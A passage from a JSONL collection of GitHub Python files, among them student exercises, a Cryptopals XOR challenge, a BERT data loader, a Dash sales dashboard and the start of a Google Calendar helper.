print(LifeLike_color.BOLD, LifeLike_color.RED)\n print(\" If this is your first time playing, \")\n print(\" use 'pls help' to get info on all the commands!\")\n print(LifeLike_color.END)\n parse_command(get_command())\n shelvefile = shelve.open('save_game')\n shelvefile['wallet'] = wallet\n shelvefile['bank'] = bank\n shelvefile['newUser'] = newUser\n shelvefile.close()\n print('')\n","repo_name":"vanArthur/lifelike","sub_path":"LifeLike.py","file_name":"LifeLike.py","file_ext":"py","file_size_in_byte":9211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34984145924","text":"# Set de problemas #3\n# Problema 1.\n# Lenguaje y Tecnicas de Programacion\n# Profesor: Igor Caracci\n# Profesor(Ayudante): Andres Caro\n# Universidad de Santiago de Chile\n# 10 de mayo del 2013\n#\n# Descripcion:\n#\n# Construya una función recursiva tri_pascal(n) que tome como argumento\n# el grado del binomio asociado a los coeficientes binomiales y construya\n# el triángulo de Pascal mostrando hasta los coeficientes del polinomio de\n# grado n resultante.\n\n# Funcion del triangulo pascal recursivo\ndef tri_pascal(n): \n\n # En el caso de la parte base del triangulo \n if n == 0: \n return [] \n if n == 1:\n return[[1]] \n\n # Parte del triangulo en forma recursiva \n ultimo_triangulo = tri_pascal(n-1) \n current_triangulo = [1] \n for i in range(1, n-1): \n current_triangulo.append(ultimo_triangulo[n-2][i-1] + ultimo_triangulo[n-2][i]) \n current_triangulo.append(1)\n ultimo_triangulo.append(current_triangulo)\n return ultimo_triangulo\n\ndef ultimo_triangulo(n):\n triangulo = tri_pascal(n)\n return triangulo[n-1]\n\nwhile True:\n grado = input(\"Grado del triangulo : \")\n if ( not grado.isnumeric() ):\n print(\"Error, \",grado,\" no es un numero \")\n elif ( int(grado) < 1 ):\n print(\"Error, numero \",grado,\" menor a 1\")\n else:\n triangulos = tri_pascal(int(grado))\n i = 0\n for fila in triangulos:\n print(\"n =\",i,\":\",end=\"\")\n i = i + 1\n for coef in fila:\n print(coef,\" \",end=\"\")\n print()\n break\n","repo_name":"Dhual-Yhn/setp03","sub_path":"tri_pascal.py","file_name":"tri_pascal.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26680747986","text":"#!/usr/bin/env python\n\nfrom os.path import join, dirname, abspath\n\nfrom IPython.terminal.ipapp import TerminalIPythonApp\nfrom ipykernel.kernelapp import IPKernelApp\n\nhere = abspath(dirname(__file__))\noptions = join(here, 'source', 'config', 'options')\ngenerated = join(options, 'generated.rst')\n\ndef write_doc(name, title, app, preamble=None):\n filename = '%s.rst' % name\n with open(join(options, filename), 'w') as f:\n f.write(title + '\\n')\n f.write(('=' * len(title)) + '\\n')\n f.write('\\n')\n if preamble is not None:\n f.write(preamble + '\\n\\n')\n f.write(app.document_config_options())\n with open(generated, 'a') as f:\n f.write(filename + '\\n')\n\n\nif __name__ == '__main__':\n # create empty file\n with open(generated, 'w'):\n pass\n\n write_doc('terminal', 'Terminal IPython options', TerminalIPythonApp())\n write_doc('kernel', 'IPython kernel options', IPKernelApp(),\n preamble=(\"These options can be used in :file:`ipython_kernel_config.py`. 
\"\n \"The kernel also respects any options in `ipython_config.py`\"),\n )\n\n","repo_name":"DiegoAgher/imag_recognition_project","sub_path":"ipython/docs/autogen_config.py","file_name":"autogen_config.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22960647639","text":"#!/usr/bin/python3\nimport argparse, challenge3\n\nif __name__ == \"__main__\":\n\tDESCRIPTION = \"\"\"Find a single XOR'd ciphertext in a list of ciphertexts and break it.\n\thttps://cryptopals.com/sets/1/challenges/4\"\"\"\n\tparser = argparse.ArgumentParser(prog='Cryptopals Set 1 - Challenge 4', description=DESCRIPTION)\n\tparser.add_argument('-f','--file', required=True, type=argparse.FileType('r') , help='File containing ciphertexts one per line.')\n\targs = parser.parse_args()\n\tciphertexts = args.file.read().splitlines()\n\tprint(\"{0} ciphertexts loaded.\".format(len(ciphertexts)))\n\tresult = list()\n\tfor ciphertext in ciphertexts:\n\t\tresult.append(challenge3.breaksinglexor(ciphertext,top=1))\n\tprint(\"Showing possible result:\")\n\tcandidate = {'count' : 0}\n\tj = 0\n\tfor i in result:\n\t\tif i:\n\t\t\tif candidate['count'] < i[0]['count']:\n\t\t\t\tcandidate = i[0]\n\t\t\t\tj = result.index(i)\n\tprint(\"Key: {0} Ciphertext: {1} Plaintext: {2}\".format(candidate['key'],ciphertexts[j],candidate['plaintext']))","repo_name":"videlanicolas/cryptopals","sub_path":"set1/challenge4/challenge4.py","file_name":"challenge4.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32460584386","text":"import cv2 as cv\nimport numpy as np\nimport Util.VisionUtil.VisionUtil as VisionUtil\nfrom math import atan2, cos, sin, sqrt, pi\n\nfrom scipy.spatial import distance as dist\n\n# VisionUtil = VisionUtil.VisionUtil\n\nclass MathHelper:\n \n horizontal = [1., 0.]\n\n def getPrincipalAxes(contourPoints):\n mean = np.empty((0))\n mean, eigenvectors, eigenvalues = cv.PCACompute2(contourPoints, mean)\n cntr = (int(mean[0, 0]), int(mean[0, 1]))\n x = [eigenvectors[0][0], eigenvectors[1][0]]\n y = [eigenvectors[0][1], eigenvectors[1][1]]\n p1 = (cntr[0] + 0.02 * eigenvectors[0,0] * eigenvalues[0,0], cntr[1] + 0.02 * eigenvectors[0,1] * eigenvalues[0,0])\n p2 = (cntr[0] - 0.02 * eigenvectors[1,0] * eigenvalues[1,0], cntr[1] - 0.02 * eigenvectors[1,1] * eigenvalues[1,0])\n return x, y, cntr\n\n def sortRectPoints(pts):\n # sort the points based on their x-coordinates\n xSorted = pts[np.argsort(pts[:, 0]), :]\n \n # grab the left-most and right-most points from the sorted\n # x-roodinate points\n leftMost = xSorted[:2, :]\n rightMost = xSorted[2:, :]\n \n # now, sort the left-most coordinates according to their\n # y-coordinates so we can grab the top-left and bottom-left\n # points, respectively\n leftMost = leftMost[np.argsort(leftMost[:, 1]), :]\n (tl, bl) = leftMost\n \n # now that we have the top-left coordinate, use it as an\n # anchor to calculate the Euclidean distance between the\n # top-left and right-most points; by the Pythagorean\n # theorem, the point with the largest distance will be\n # our bottom-right point\n D = dist.cdist(tl[np.newaxis], rightMost, \"euclidean\")[0]\n (br, tr) = rightMost[np.argsort(D)[::-1], :]\n \n # return the coordinates in top-left, top-right,\n # bottom-right, and bottom-left order\n return np.array([tl, tr, br, bl], dtype=\"float32\")\n \n def getBoundingBoxPoints(points):\n x, y, w, h 
= cv.boundingRect(points)\n boundingBoxPoints = np.array([[x, y],\n [x + w, y],\n [x + w, y - h],\n [x, y - h]\n ], dtype=np.float32)\n # return the bounding box verticies, the area of the bounding box, and the aspect ratio of the width and height of the boudning box\n return boundingBoxPoints, w * h, w / h\n \n def getReferenceVector(pts):\n # first sort the points in a clockwise manner\n pts = MathHelper.sortRectPoints(pts)\n\n # construct our reference vector and normalize it\n referenceVector = [pts[1][0] - pts[0][0], pts[0][1] - pts[1][1]]\n referenceVector = MathHelper.norm(referenceVector)\n\n return referenceVector\n\n # get the midpoint of a contour\n def getMidpoint(pts):\n return 0\n\n def rotatePoint(pt, angle):\n x = (pt[0] * np.cos(angle)) - (pt[1] * np.sin(angle))\n y = (pt[1] * np.cos(angle)) + (pt[0] * np.sin(angle))\n return [x, y]\n\n def dot(a, b): \n return (a[0] * b[0]) + (a[1] * b[1])\n\n def norm(vector):\n return vector / MathHelper.getLength(vector)\n\n def getLength(vector):\n return np.linalg.norm(vector)\n\n def getRelativeAngleDirection(a, b):\n return ((a[0] * b[1]) - (a[1] * b[0])) > 0\n\n def getAngle(a, b, signedRange = None):\n rotation = np.arccos(round(MathHelper.dot(a, b), 6) / round((MathHelper.getLength(a) * MathHelper.getLength(b)), 6))\n if signedRange is not None:\n sign = MathHelper.getRelativeAngleDirection(a, b)\n if (not sign):\n if (signedRange):\n rotation = rotation * -1.0\n else :\n rotation = (2 * np.pi) - rotation\n return rotation","repo_name":"FRCTeam2910/JesterVision","sub_path":"src/Util/MathUtil/MathHelper.py","file_name":"MathHelper.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74714038952","text":"import sys\n# sys.stdin = open('input.txt','r')\ninput = sys.stdin.readline\n\nfor _ in range(int(input())):\n n = int(input())\n s = input()\n cnt = 0\n for i in range(n):\n cnt += s[i] == '0'\n if cnt == 1:\n print(\"BOB\")\n elif cnt & 1 == 0:\n print(\"BOB\")\n else:\n print(\"ALICE\")","repo_name":"dminhvu/CompetitiveProgramming","sub_path":"Coding Problems/Codeforces/1527B1.py","file_name":"1527B1.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9848473979","text":"import os\nimport random\nimport json\nimport torch\nimport torch.nn as nn\n\nfrom collections import namedtuple\n\n# Can be simply regarded as a object, called \"Batch\", having attributes \"input\" and \"target\"\nBatch = namedtuple('Batch', 'input target')\n\n# bert-like processing\ndef parse_sentence(sent, word_to_idx, max_seq_len):\n token_idxs, token_type_idxs, mask = [word_to_idx('[CLS]')], [0], [1] # (seq_len)\n\n length = len(sent)\n if length > max_seq_len - 2:\n # print ('Warning: exceed max_seq_len')\n length = max_seq_len - 2\n sent = sent[:length]\n\n token_idxs += [word_to_idx(w) for w in sent] + [word_to_idx('[SEP]')]\n token_type_idxs += [0] * (length + 1) # +1 for [SEP] following the sentence\n mask += [1] * (length + 1) # +1 for [SEP]\n\n assert len(token_idxs) == len(token_type_idxs) and len(token_idxs) == len(mask) and len(mask) <= max_seq_len\n\n return token_idxs, token_type_idxs, mask\n\n\nclass Dataset(): \n\n def __init__(self, train_file, dev_file, test_file, word_to_idx, max_seq_len=512, use_gpu=False):\n # word_to_idx: function, whose input is a string and output an int\n\n self.use_gpu = use_gpu\n self.max_seq_len = max_seq_len\n 
self.num_classes = 2\n\n self.train_file = train_file\n self.dev_file = dev_file\n self.test_file = test_file\n\n self.word_to_idx = word_to_idx\n\n self.num_train_samples = 0\n for batch in self.trainset(batch_size=1000):\n self.num_train_samples += batch.input[0].shape[0]\n\n self.num_dev_samples = 0\n for batch in self.devset(batch_size=1000):\n self.num_dev_samples += batch.input[0].shape[0]\n\n self.num_test_samples = 0\n for batch in self.testset(batch_size=1000):\n self.num_test_samples += batch.input[0].shape[0]\n\n def trainset(self, batch_size=1, drop_last=False):\n for batch in self.sample_batches(self.train_file, batch_size=batch_size, drop_last=drop_last):\n yield batch\n \n def devset(self, batch_size=1, drop_last=False):\n for batch in self.sample_batches(self.dev_file, batch_size=batch_size, drop_last=drop_last):\n yield batch\n\n def testset(self, batch_size=1, drop_last=False):\n for batch in self.sample_batches(self.test_file, batch_size=batch_size, drop_last=drop_last):\n yield batch\n\n def pad_sequence(self, s):\n return nn.utils.rnn.pad_sequence(s, batch_first=True)\n\n def samples(self, file_path):\n\n with open(file_path, 'r') as f:\n\n labels = f.readline().strip().split('\\t') # Omit tsv header\n\n for line in f:\n tag, sent = line.strip().split('\\t')\n # print (tag, sent)\n yield sent, tag\n \n \n def sample_batches(self, file_path, batch_size=1, drop_last=False):\n # drop_last: drop the last incomplete batch if True\n cnt = 0\n\n # Input\n token_idxs_batch, token_type_idxs_batch, mask_batch = [], [], [] # (batch_size, seq_len)\n # Target\n tag_batch = [] # (batch_size)\n\n for sent, tag in self.samples(file_path):\n # all string-like\n\n # bert-like processing\n token_idxs, token_type_idxs, mask = parse_sentence(sent, self.word_to_idx, self.max_seq_len) # (seq_len)\n\n token_idxs = torch.LongTensor(token_idxs)\n token_type_idxs = torch.LongTensor(token_type_idxs)\n mask = torch.LongTensor(mask)\n tag = torch.LongTensor([int(tag)])\n\n if self.use_gpu:\n token_idxs, token_type_idxs, mask, tag = token_idxs.cuda(), token_type_idxs.cuda(), mask.cuda(), tag.cuda()\n\n token_idxs_batch.append(token_idxs)\n token_type_idxs_batch.append(token_type_idxs)\n mask_batch.append(mask)\n tag_batch.append(tag)\n\n cnt += 1\n\n if cnt >= batch_size:\n\n yield Batch(input=(self.pad_sequence(token_idxs_batch), \n self.pad_sequence(token_type_idxs_batch), \n self.pad_sequence(mask_batch)), \n target=torch.cat(tag_batch))\n\n token_idxs_batch, token_type_idxs_batch, mask_batch, tag_batch = [], [], [], []\n cnt = 0\n\n if cnt > 0 and not drop_last:\n yield Batch(input=(self.pad_sequence(token_idxs_batch), \n self.pad_sequence(token_type_idxs_batch), \n self.pad_sequence(mask_batch)), \n target=torch.cat(tag_batch))\n\nif __name__ == '__main__': \n # Usage\n train_file = 'train.tsv'\n dev_file = 'dev.tsv'\n test_file = 'test.tsv'\n\n def word_to_idx(w):\n w2i = {'当': 1, '希': 2}\n return w2i.get(w, 0)\n\n dataset = Dataset(train_file=train_file, dev_file=dev_file, test_file=test_file, word_to_idx=word_to_idx)\n\n print (f'trainset: {dataset.num_train_samples}')\n print (f'devset: {dataset.num_dev_samples}')\n print (f'testset: {dataset.num_test_samples}')\n\n cnt = 0\n for (token_idxs_batch, token_type_idxs_batch, mask_batch), tag_batch in dataset.trainset(batch_size=10, drop_last=False):\n # print (f'input_batch: {token_idxs_batch.shape, token_type_idxs_batch.shape, mask_batch.shape}, target_batch: {tag_batch.shape}')\n # print (token_idxs_batch)\n # input ()\n cnt += 
tag_batch.shape[0]\n print (f'trainset: {cnt}')\n \n cnt = 0\n for (token_idxs_batch, token_type_idxs_batch, mask_batch), tag_batch in dataset.devset(batch_size=10, drop_last=False):\n # print (f'input_batch: {token_idxs_batch.shape, token_type_idxs_batch.shape, mask_batch.shape}, target_batch: {tag_batch.shape}')\n # input ()\n cnt += tag_batch.shape[0]\n print (f'devset: {cnt}')\n\n cnt = 0\n for (token_idxs_batch, token_type_idxs_batch, mask_batch), tag_batch in dataset.testset(batch_size=10, drop_last=False):\n # print (f'input_batch: {token_idxs_batch.shape, token_type_idxs_batch.shape, mask_batch.shape}, target_batch: {tag_batch.shape}')\n # input ()\n cnt += tag_batch.shape[0]\n print (f'testset: {cnt}')\n \n\n","repo_name":"Hongqin-Li/NTFS","sub_path":"data/chnsenticorp/dataset_bert.py","file_name":"dataset_bert.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28170583144","text":"def secret_number():\n import random\n goalnumber = random.randint(1, 50)\n numberoftries = 0\n while True:\n chosennumber = int(input(\"What number (from 1-50) would you like to choose? \"))\n if chosennumber > 50 or chosennumber < 1:\n print(\"Invalid option, try again\")\n elif chosennumber == goalnumber:\n print(\"That's the number, you win!\")\n numberoftries += 1\n break\n elif chosennumber < goalnumber:\n print(\"That number is too low\")\n numberoftries += 1\n else:\n print(\"That number is too high\")\n numberoftries += 1\n tryword = \"try\" if numberoftries == 1 else \"tries\"\n print(\"\\nIt took you\",numberoftries,tryword,\"to guess the number\")\n\n # Version WITH recursion\nimport random\n\ndef secret_number2(goal, tries):\n chosennumber = int(input(\"What number (from 1-50) would you like to choose? 
\"))\n won = False\n if chosennumber > 50 or chosennumber < 1:\n print(\"Invalid option, try again\")\n elif chosennumber == goal:\n print(\"That's the number, you win!\")\n tries += 1\n won = True\n elif chosennumber < goal:\n print(\"That number is too low\")\n tries += 1\n else:\n print(\"That number is too high\")\n tries += 1\n if won:\n tryword = \"try\" if tries == 1 else \"tries\"\n print(\"\\nIt took you\",tries,tryword,\"to guess the number\")\n else:\n secret_number2(goal, tries)\n\nsecret_number2(random.randint(1, 50), 0)\n","repo_name":"JustineTang10/python-class","sub_path":"1-10-2021.py","file_name":"1-10-2021.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37351792375","text":"import os\nimport random\nimport logging\n\nimport torch\nimport numpy as np\nfrom seqeval.metrics import precision_score, recall_score, f1_score\nfrom sklearn.metrics import classification_report\n\nfrom transformers import BertConfig, DistilBertConfig, AlbertConfig\nfrom transformers import BertTokenizer, DistilBertTokenizer, AlbertTokenizer\n\n\ndef get_labels(label_file):\n return [label.strip() for label in open(label_file, 'r', encoding='utf-8')]\n\n\ndef init_logger():\n logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\n\n\ndef set_seed(args):\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n if not args.no_cuda and torch.cuda.is_available():\n torch.cuda.manual_seed_all(args.seed)\n\n\ndef compute_metrics(intent_preds, intent_labels):\n assert len(intent_preds) == len(intent_labels)\n results = {}\n classification_report_dict = classification_report(intent_preds, intent_labels, output_dict=True)\n for key0, val0 in classification_report_dict.items():\n if isinstance(val0, dict):\n for key1, val1 in val0.items():\n results[key0 + \"__\" + key1] = val1\n\n else:\n results[key0] = val0\n return results\n\n\ndef read_prediction_text(args):\n return [text.strip() for text in open(os.path.join(args.pred_dir, args.pred_input_file), 'r', encoding='utf-8')]\n","repo_name":"Coding-Zuo/DaguanFengxian","sub_path":"baseline2/training/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"41941502840","text":"import torch\nfrom infrastructure.words import bag_of_words, tokenize\n\n\nclass NeuralNet(torch.nn.Module):\n\n def __init__(self, data, device):\n super(NeuralNet, self).__init__()\n self.data = data\n self.l1 = torch.nn.Linear(data['input_size'], data['hidden_size'])\n self.l2 = torch.nn.Linear(data['hidden_size'], data['hidden_size'])\n self.l3 = torch.nn.Linear(data['hidden_size'], data['output_size'])\n self.relu = torch.nn.ReLU()\n self.device = device\n self.to(device)\n\n def forward(self, x):\n out = self.l1(x)\n out = self.relu(out)\n out = self.l2(out)\n out = self.relu(out)\n out = self.l3(out)\n return out\n\n def find_probability(self, query_question):\n sentence_ = tokenize(query_question)\n X = bag_of_words(sentence_, self.data['all_words'])\n X = X.reshape(1, X.shape[0])\n X = torch.from_numpy(X).to(self.device)\n\n output = self(X)\n _, predicted = torch.max(output, dim=1)\n\n probabilities = torch.softmax(output, dim=1)\n return probabilities, 
predicted\n\n","repo_name":"naspredam/simple-chat-bot","sub_path":"engine/application/neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"7028065286","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport numpy as np\nfrom dash.dependencies import Input, Output, State\n\nimport plotly.graph_objs as go\nimport plotly.express as px\n\nimport pandas as pd\n\nfrom fileReader import *\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\n# CSS for the tab labels\ntabs_styles = {'height': '44px'}\ntab_style = {\n 'borderBottom': '1px solid #d6d6d6',\n 'padding': '6px',\n 'fontWeight': 'bold'\n}\ntab_selected_style = {\n 'borderTop': '1px solid #d6d6d6',\n 'borderBottom': '1px solid #d6d6d6',\n 'backgroundColor': '#119DFF',\n 'color': 'white',\n 'padding': '6px'\n}\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\ndf = pd.read_csv(\"dataset/black-friday/BlackFriday.csv\")\n\nfile = read_file()\n\n# get the product categories\nproduct_category_1, product_category_2, product_category_3 = get_product_category_1()\n\n# page layout\napp.layout = html.Div([\n html.Div([\n html.Div([\n html.Div([\n html.Label(\"Product Category1\"),\n dcc.Dropdown(\n id=\"category_1\",\n options=[{\n \"label\": i,\n \"value\": i\n } for i in product_category_1],\n value=\"All\",\n ),\n html.Label(\"Product Category2\"),\n dcc.Dropdown(\n id=\"category_2\",\n ),\n html.Label(\"Product Category3\"),\n dcc.Dropdown(\n id=\"category_3\",\n ),\n ],\n style={\n # \"border\": \"2px black solid\"\n }),\n # scatter plot\n dcc.Graph(\n id='sale-price-scatter-plot',\n )\n ],\n style={\n \"width\": \"49%\",\n \"display\": \"inline-block\",\n }),\n html.Div([\n # bar chart\n html.Div([\n dcc.Graph(\n id='age-sex-purchase-bar-chart'\n )\n ]),\n dcc.Tabs(\n id=\"tabs\",\n style=tabs_styles,\n children=[\n # tab1\n dcc.Tab(\n label=\"Purchase on Black Friday across all ages\",\n style=tab_style,\n selected_style=tab_selected_style,\n children=[\n html.Div([\n dcc.Graph(\n id='age-purchase-pie-chart',\n animate=True\n ),\n ]),\n ]\n ),\n # tab2\n dcc.Tab(\n label=\"Residence time and purchase of each city\",\n style=tab_style,\n selected_style=tab_selected_style,\n children=[\n html.Div([\n # line chart\n dcc.Graph(\n id='city-live-sale-line-chart'\n )\n ])\n ]\n )\n ]\n )\n ],\n style={\n \"width\": \"49%\",\n \"float\": \"right\",\n \"display\": \"inline-block\"\n })\n ])\n])\n\napp.title = \"Black-Friday\"\n\n\n# line chart\n@app.callback(\n Output('city-live-sale-line-chart', 'figure'),\n Input('category_1', 'value'),\n Input('category_2', 'value'),\n Input('category_3', 'value')\n)\ndef update_city_live_sale_line_chart(category_1, category_2, category_3):\n new_file = read_file()\n new_file = file_filter(new_file, category_1, category_2, category_3)\n\n sales = get_line_char(new_file)\n\n cities_for_line_chart = []\n\n for i in range(len(cities)):\n for j in range(len(stay_in_current_city_years)):\n cities_for_line_chart.append(cities[i])\n\n line_df = pd.DataFrame({\n \"Sales\": sales,\n \"LiveYears\": stay_in_current_city_years * len(cities),\n \"Cities\": cities_for_line_chart,\n })\n\n line_fig = px.line(line_df, x='LiveYears', y='Sales', color='Cities', title=\"city-live-time-sale-line-chart\")\n\n return line_fig\n\n\n# scatter plot\n@app.callback(\n Output('sale-price-scatter-plot', 'figure'),\n Input('category_1', 'value'),\n Input('category_2', 'value'),\n 
Input('category_3', 'value')\n)\ndef update_sale_price_scatter_plot(category_1, category_2, category_3):\n new_file = read_file()\n new_file = file_filter(new_file, category_1, category_2, category_3)\n\n [product_id, product_sales, product_price, product_total, product_category] = get_sales_price(new_file)\n\n scatter_df = pd.DataFrame({\n \"ProductId\": product_id,\n \"ProductSales\": product_sales,\n \"ProductPrice\": product_price,\n \"ProductTotal\": product_total,\n \"ProductCategory\": product_category,\n })\n\n scatter_fig = px.scatter(scatter_df, x=\"ProductSales\", y=\"ProductPrice\",\n size=\"ProductTotal\", color=\"ProductCategory\", hover_name=\"ProductId\",\n title=\"sale-price-scatter-plot\",\n log_x=True, size_max=60, height=750)\n return scatter_fig\n\n\n# bar chart\n@app.callback(\n Output('age-sex-purchase-bar-chart', 'figure'),\n Input('category_1', 'value'),\n Input('category_2', 'value'),\n Input('category_3', 'value')\n)\ndef update_age_sex_purchase_bar_chart(category_1, category_2, category_3):\n new_file = read_file()\n new_file = file_filter(new_file, category_1, category_2, category_3)\n\n [x, y] = get_age_sex_purchase(new_file)\n\n sex = []\n\n for i in range(len(content_age_category) * 2):\n if i < 7:\n sex.append('M')\n else:\n sex.append('F')\n\n bar_df = pd.DataFrame({\n \"Age\": content_age_category + content_age_category,\n \"Purchase\": x + y,\n \"Sex\": sex\n })\n\n bar_fig = px.bar(bar_df, x=\"Age\", y=\"Purchase\", color=\"Sex\", barmode=\"group\", title=\"age-sex-purchase-bar-chart\")\n\n return bar_fig\n\n\n# pie chart\n@app.callback(\n Output('age-purchase-pie-chart', 'figure'),\n Input('category_1', 'value'),\n Input('category_2', 'value'),\n Input('category_3', 'value')\n)\ndef update_age_purchase_pie_chart(category_1, category_2, category_3):\n new_file = read_file()\n new_file = file_filter(new_file, category_1, category_2, category_3)\n\n [content_purchase_list] = get_age_purchase(new_file)\n\n # print([content_age_category, content_purchase_list])\n\n pie_df = pd.DataFrame({\n \"Labels\": content_age_category,\n \"Purchase\": content_purchase_list,\n })\n\n pie_fig = px.pie(pie_df, names=\"Labels\", values=\"Purchase\", title=\"age-purchase-pie-chart\")\n\n return pie_fig\n\n\n# set the category2 options\n@app.callback(\n Output('category_2', 'options'),\n Input('category_1', 'value'))\ndef set_category_2_options(category_1):\n if category_1 == \"All\":\n return [{\"label\": \"All\", \"value\": \"All\"}]\n return [{'label': i, 'value': i} for i in product_category_2[int(category_1)]]\n\n\n@app.callback(\n Output('category_2', 'value'),\n Input('category_2', 'options'))\ndef set_category_2_value(available_options):\n return available_options[0]['value']\n\n\n# set the category3 options\n@app.callback(\n Output('category_3', 'options'),\n Input('category_1', 'value'),\n Input('category_2', 'value'))\ndef set_category_3_options(category_1, category_2):\n if category_1 == \"All\" or category_2 == \"All\":\n return [{\"label\": \"All\", \"value\": \"All\"}]\n return [{'label': i, 'value': i} for i in product_category_3[int(category_2)]]\n\n\n@app.callback(\n Output('category_3', 'value'),\n Input('category_3', 'options'))\ndef set_category_3_value(available_options):\n return available_options[0]['value']\n\n\nif __name__ == '__main__':\n 
app.run_server(debug=True)\n","repo_name":"matianfang1998/Human-Computer-Interaction","sub_path":"lab3-data-visualization/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"416066902","text":"#-------------Desafio 18-------------------------#\r\n# write a program that reads any angle and shows on screen the sine, cosine, and tangent of that angle.\r\nimport math # importing the math library\r\nang = float(input('Enter the angle whose sine / cosine / tangent you want to know: ')) # variable ang read as a primitive float\r\nang1 = math.radians(ang) # angle converted to radians with math.radians\r\nseno = math.sin(ang1) # sine of the angle via math.sin\r\ncose = math.cos(ang1) # cosine of the angle via math.cos\r\ntang = math.tan(ang1) # tangent of the angle via math.tan\r\nprint('>'*50)\r\nprint('With the angle {}°,\\nThe sine is {:.2f},\\nThe cosine is {:.2f}\\nAnd the tangent is {:.2f}'.format(ang, seno, cose, tang)) # print the computed values\r\nprint('>'*50)\r\n#----------------------------------------------------------------\r\n","repo_name":"rickicr-collab/curso-Python-Desafios-","sub_path":"desafio18.py","file_name":"desafio18.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"25669932245","text":"#!/usr/bin/python\n# encoding: utf-8\n\"\"\"\ngcalendar.py\nGoogle Calendar functionality.\n\nCreated by Shane O'Connor 2014\n\"\"\"\n\nif __name__ == '__main__':\n import sys\n sys.path.insert(0, '../..')\n\nimport pprint\nimport copy\nimport time\nimport traceback\nimport json\nimport httplib2\nfrom datetime import datetime, timedelta, date\nimport dateutil.parser\n\nimport pytz\nfrom apiclient.discovery import build\nfrom oauth2client.client import SignedJwtAssertionCredentials\n\nfrom klab.general.structures import NestedBunch, NonStrictNestedBunch, DeepNonStrictNestedBunch\nfrom klab.fs.fsio import read_file\nfrom klab import colortext\nfrom .gauth import OAuthCredentials\n\nclass BasicEvent(object):\n\n def __init__(self, calendar_object, start_dt, end_dt, location = None, summary = None, description = None, visibility = 'default', email_map = {}, username_map = {}):\n '''start_dt should be a datetime.date object for all-day events or a datetime.datetime object for ranged events. Similarly for end_dt.
\n '''\n e = {}\n self.timezone_string = calendar_object.timezone_string\n assert(visibility == 'default' or visibility == 'public' or visibility == 'private' or visibility == 'confidential')\n # datetime is a subclass of date, so test for datetime first\n if isinstance(start_dt, datetime):\n e['start'] = {'dateTime' : start_dt.isoformat(), 'timeZone' : self.timezone_string}\n else:\n assert(isinstance(start_dt, date))\n e['start'] = {'date' : start_dt.isoformat(), 'timeZone' : self.timezone_string}\n if isinstance(end_dt, datetime):\n e['end'] = {'dateTime' : end_dt.isoformat(), 'timeZone' : self.timezone_string}\n else:\n assert(isinstance(end_dt, date))\n e['end'] = {'date' : end_dt.isoformat(), 'timeZone' : self.timezone_string}\n e['summary'] = summary\n e['description'] = description or summary\n e['location'] = location\n e['status'] = 'confirmed'\n self.email_map = email_map\n self.username_map = username_map\n self.event = e\n\n def initialize_tagged_copy(self):\n e = copy.deepcopy(self.event)\n e['extendedProperties'] = e.get('extendedProperties', {})\n e['extendedProperties']['shared'] = e['extendedProperties'].get('shared', {})\n assert(not(e['extendedProperties']['shared'].get('event_type')))\n return e\n\n\n # Main calendar\n\n\n def create_lab_meeting(self, event_type, presenters, foodie = None, locked = False):\n 'Presenters can be a comma-separated list of presenters.'\n e = self.initialize_tagged_copy()\n summary_texts = {\n 'Lab meeting' : 'Kortemme Lab meeting',\n 'Kortemme/DeGrado joint meeting' : 'DeGrado/Kortemme labs joint meeting'\n }\n assert(summary_texts.get(event_type))\n e['extendedProperties']['shared']['event_type'] = event_type\n e['extendedProperties']['shared']['Presenters'] = presenters\n e['extendedProperties']['shared']['Food'] = foodie\n e['extendedProperties']['shared']['Locked meeting'] = locked\n print(presenters)\n print([[p for p in presenters.split(',')] + [foodie]])\n participants = [p.strip() for p in ([p for p in presenters.split(',')] + [foodie]) if p and p.strip()]\n participants = [p for p in [self.email_map.get(p) for p in participants] if p]\n participant_names = [self.username_map.get(p.strip(), p.strip()) for p in presenters.split(',') if p.strip()]\n if participants:\n e['extendedProperties']['shared']['ParticipantList'] = ','.join(participants)\n if not e['summary']:\n e['summary'] = '%s: %s' % (summary_texts[event_type], ', '.join(participant_names))\n e['description'] = e['description'] or e['summary']\n return e\n\n\n def create_journal_club_meeting(self, presenters, food_vendor, paper = None):\n 'Presenters can be a comma-separated list of presenters.'\n e = self.initialize_tagged_copy()\n e['extendedProperties']['shared']['event_type'] = 'Journal club'\n e['extendedProperties']['shared']['Presenters'] = 